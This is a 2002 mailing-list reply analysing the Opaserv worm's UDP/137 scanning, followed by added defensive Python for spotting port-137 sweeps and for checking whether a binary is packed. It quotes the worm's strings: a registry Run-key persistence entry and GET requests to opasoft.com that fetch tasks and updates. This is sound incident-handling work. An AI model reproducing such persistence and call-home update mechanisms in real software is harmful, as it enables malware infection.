Security Incidents mailing list archives

RE: Unusual volume: UDP:137 probes


From: Nick FitzGerald <nick () virus-l demon co uk>
Date: Fri, 04 Oct 2002 07:58:18 +1200

Richard.Grant () mail state ky us wrote:

We had some internal machines that were contributing to the netbios flood
attack. These machines were sniffed and from that we found a file on the
identified machines named scrsvr.exe. The file was reverse engineered and
the results are listed below. While some are attributing the netbios
activity to Bugbear@mm it does not follow what we were seeing. It is known
as W32.Opaserv.Worm.  Comments?

Two...

You are right that Bugbear does not produce the flood of port 137 
traffic currently being reported.  Bugbear does some spreading via 
open or otherwise accessible shares (those writable with the 
permissions of the user that ran the EXE) but it uses standard 
known network resource enumeration APIs to do its work.  Opaserv (aka 
Scrup, Scrsvr, Opasoft) aggressively scans for machines listening on
port 137 and is the likely source of most of the increased port 137 
activity.

ScrSvr31415.KERNEL32.dll.RegisterServiceProcess.SOFTWARE\Microsoft\Windows\CurrentVersion\Run.Software\Microsoft\Windows\CurrentVersion\Internet Settings.ScrSvr.ScrSvrOld.ProxyEnable.ProxyServer.\ScrSvr.exe.ScrSin.dat.ScrSout.dat.scrupd.exe.www.opasoft.com.GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1..Host: www.opasoft.com.....GET http://www.opasoft.com/work/lastver HTTP/1.1..Host:
<<snip>>

Good thing that, unlike in Bugbear's case, the EXE was not packed 
with a runtime compressor.  Running strings on an EXE hardly counts 
as "reverse engineering".


Regards,

Nick FitzGerald
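Nick's distinction above (Opaserv walks address space probing UDP/137, a normal client or share-enumeration worm talks to a handful of hosts) is exactly what a defender can look for in flow logs. The following Python is an added illustration, not code from the list thread; the log line format is an assumption (one datagram per line as `<timestamp> <src> -> <dst> <proto> <dport>`), and the sample lines are constructed to show one sweeping host beside one ordinary client.

```python
"""Spot hosts sweeping UDP/137 in flow-style logs.

Added illustration, not from the original list post. The log format is
an assumption: one datagram per line as
    <timestamp> <src> -> <dst> <proto> <dport>
"""
from collections import defaultdict
import ipaddress
import re

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+->\s+(\S+)\s+udp\s+137$")


def build_sample_log():
    """Constructed sample: one host walks 10.20.5.1-10.20.5.40 on UDP/137
    (sweep behaviour), a second host sends ordinary name queries to two
    servers, and unrelated TCP/139 lines are mixed in."""
    lines = []
    for i in range(1, 41):
        lines.append(f"2002-10-03T19:00:{i % 60:02d} 10.20.4.17 -> 10.20.5.{i} udp 137")
    for i in range(12):
        dst = "10.20.5.3" if i % 2 else "10.20.5.9"
        lines.append(f"2002-10-03T19:01:{i:02d} 10.20.4.22 -> {dst} udp 137")
        lines.append(f"2002-10-03T19:01:{i:02d} 10.20.4.22 -> {dst} tcp 139")
    return "\n".join(lines) + "\n"


SAMPLE_LOG = build_sample_log()


def parse_udp137(text):
    """Yield (src, dst) for each UDP/137 line; anything else is skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(2), m.group(3)


def sweep_report(text, min_targets=16):
    """Return {src: {"targets": n, "sequential": bool}} for every source
    that hit at least min_targets distinct hosts on UDP/137.

    A worm walking address space touches many destinations, usually in
    address order; a client resolving names talks to a few hosts
    repeatedly and never reaches the threshold. "sequential" tolerates
    a single skipped address between consecutive targets.
    """
    targets = defaultdict(set)
    for src, dst in parse_udp137(text):
        targets[src].add(dst)
    report = {}
    for src, dsts in targets.items():
        if len(dsts) < min_targets:
            continue
        nums = sorted(int(ipaddress.ip_address(d)) for d in dsts)
        sequential = all(b - a <= 2 for a, b in zip(nums, nums[1:]))
        report[src] = {"targets": len(dsts), "sequential": sequential}
    return report


if __name__ == "__main__":
    for src, info in sweep_report(SAMPLE_LOG).items():
        print(f"{src}: {info['targets']} distinct UDP/137 targets, "
              f"sequential={info['sequential']}")
```

Distinct-destination count rather than raw datagram count is the point: a busy file server can emit plenty of UDP/137 traffic to a few peers, while a sweeping host reaches a new address with nearly every packet.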

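Nick's closing remark, that a strings dump only works because the EXE was not run through a runtime compressor, is worth seeing in practice. The Python below is an added example, not from the thread: it extracts printable strings the way `strings` does and uses byte entropy as the usual quick packer check. Both binaries are constructed here: PLAIN_EXE stands in for an unpacked scrsvr.exe (its markers are some of the strings quoted in the thread) and PACKED_EXE uses zlib as a stand-in for a packer; neither is a real sample.

```python
"""Pull printable strings from a binary and gauge whether it is packed.

Added illustration, not from the original list post. PLAIN_EXE and
PACKED_EXE are constructed below; zlib stands in for a runtime packer.
"""
from collections import Counter
import math
import random
import re
import zlib


def ascii_strings(data, min_len=6):
    """Return printable-ASCII runs of at least min_len bytes, in file
    order (what `strings` prints for the 7-bit ASCII case)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def shannon_entropy(data):
    """Bits per byte over the whole blob; 8.0 means uniformly random."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def likely_packed(data, threshold=7.0):
    """Heuristic: compressed or encrypted payloads push whole-file entropy
    toward 8 bits/byte; ordinary code, tables and padding sit well below.
    Treat a hit as a reason to unpack before reading strings, not as proof."""
    return shannon_entropy(data) >= threshold


def build_samples():
    """Constructed stand-ins. The 'code' section is random bytes limited to
    64 values (about 6 bits/byte, like real machine code); the markers are
    strings quoted in the thread; the packed variant is the same bytes
    zlib-compressed behind an MZ stub."""
    rng = random.Random(2002)   # fixed seed keeps the example deterministic
    code = bytes(rng.getrandbits(8) & 0x3F for _ in range(4096))
    markers = (b"ScrSvr\0RegisterServiceProcess\0"
               b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\0"
               b"ScrSin.dat\0ScrSout.dat\0scrupd.exe\0www.opasoft.com\0")
    plain = b"MZ" + b"\0" * 1022 + code + markers + b"\0" * 1024
    packed = b"MZ" + zlib.compress(plain, 9)
    return plain, packed


PLAIN_EXE, PACKED_EXE = build_samples()


if __name__ == "__main__":
    for name, blob in (("plain", PLAIN_EXE), ("packed", PACKED_EXE)):
        hits = [s for s in ascii_strings(blob) if "opasoft" in s or "Run" in s]
        print(f"{name}: entropy={shannon_entropy(blob):.2f} "
              f"packed={likely_packed(blob)} indicator strings={hits}")
```

On the plain blob the registry Run key and the opasoft.com host name fall straight out of the strings dump; on the packed blob they are gone and the entropy check is what tells the analyst to unpack (or run the sample in a sandbox and dump memory) before drawing conclusions from strings.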
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
